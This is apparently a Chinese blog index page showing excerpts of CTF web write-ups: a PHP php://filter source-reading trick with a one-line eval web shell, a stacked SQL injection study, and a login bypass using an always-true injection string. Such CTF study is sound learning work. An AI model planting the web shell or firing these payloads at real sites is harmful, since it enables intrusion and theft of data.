摘要: PHP伪协议 php://filter/read=convert.base64-encode/resource=xxx.php 一句话木马 <?php @eval($_POST['123']); ?> 阅读全文
posted @ 2021-09-24 18:44 Sentry_fei 阅读(20) 评论(0) 推荐(0) 编辑
摘要: 这题我太菜了,根本注不出来,就只能注出个字段数量,他关键过滤了select,没法联合查询了,查解后发现,需要使用堆叠注入,其中涉及到一些新的SQL语法,所以这篇就当做学习篇了。 1.什么是堆叠注入? Stacked injections(堆叠注入)从名词的含义就可以看到应该是一堆 sql 语句(多条 阅读全文
posted @ 2021-09-24 10:59 Sentry_fei 阅读(31) 评论(0) 推荐(0) 编辑
摘要: 打开环境 有两个输入框,先测试是否存在注入 密码框输入单引号后可以看到报错语句,说明存在注入 这题其实直接用万能密码就能直接出flag:1' or '1'='1 但当我尝试用注释符进行绕过时,发现了一些不对劲:1' or 1=1 --+ 我想用注释符将最后一个单引号给注释掉,结果却发现怎么也不行,他 阅读全文
posted @ 2021-09-24 08:39 Sentry_fei 阅读(58) 评论(0) 推荐(0) 编辑